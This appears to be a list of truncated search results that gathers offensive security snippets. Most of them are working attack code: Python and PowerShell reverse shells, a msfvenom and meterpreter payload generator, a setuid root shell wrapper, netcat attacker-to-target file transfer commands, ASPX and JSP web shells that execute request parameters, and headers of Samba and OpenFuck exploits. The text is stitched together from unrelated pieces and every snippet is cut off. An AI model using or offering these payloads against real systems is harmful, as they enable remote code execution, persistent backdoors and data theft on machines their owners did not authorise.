/*source: http://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful expl...
Score: 0
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
setgid(0);
system( "/bin/sh -i" );
}
...
Score: 0
## Reverse Shell with Msfvenom - Cheatsheet
### List payloads
```
msfvenom -l
```
Or
```
msfvenom --list payloads
```
### Generate a PHP payload
```
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
```
### Generate a Windows payload
##### ...
Score: 0
# Reverse shell one-liner python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
...
Score: 0
$client = New-Object System.Net.Sockets.TCPClient("192.168.30.165",4444);
$stream = $client.GetStream();
$greeting = "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($greeting);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();
[byte[]]$bytes = 0..255|%{0};
while(($i = ...
Score: 0
#!/bin/bash
# meterpreter ip & port
lhost=10.10.14.xx
lport=443
echo " * Writing Payload"
cat /usr/share/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload
echo " * Prepping Comman...
Score: 0
/*
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/
#include <arpa/inet.h>
#include &...
Score: 0
Push from Client to Listener
On target machine: nc -lp [local port] > [outfile]
On attacker machine: nc -w3 [listener IP] [listener port] < [infile]
Send [infile] to listener, where it will be stored in [outfile]
Pull from Listener to Client
On target machine: nc -lp [local port] < [infile]
On attacker machine: ...
Score: 0
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%=
Process.Start(
new ProcessStartInfo("cmd" ,"/c " + Request["c"] )
{
UseShellExecute = false,
RedirectStandardOutput = true
}
).StandardOutput.ReadToEnd()
%>
...
Score: 0
<pre>
<%@ page import="java.util.*,java.io.*,java.lang.*"%>
<%
String cmd = request.getParameter("cmd");
Process a =( new java.lang.ProcessBuilder(cmd.toString().split("\\s"))).start();
InputStream in = a.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine()...
Score: 0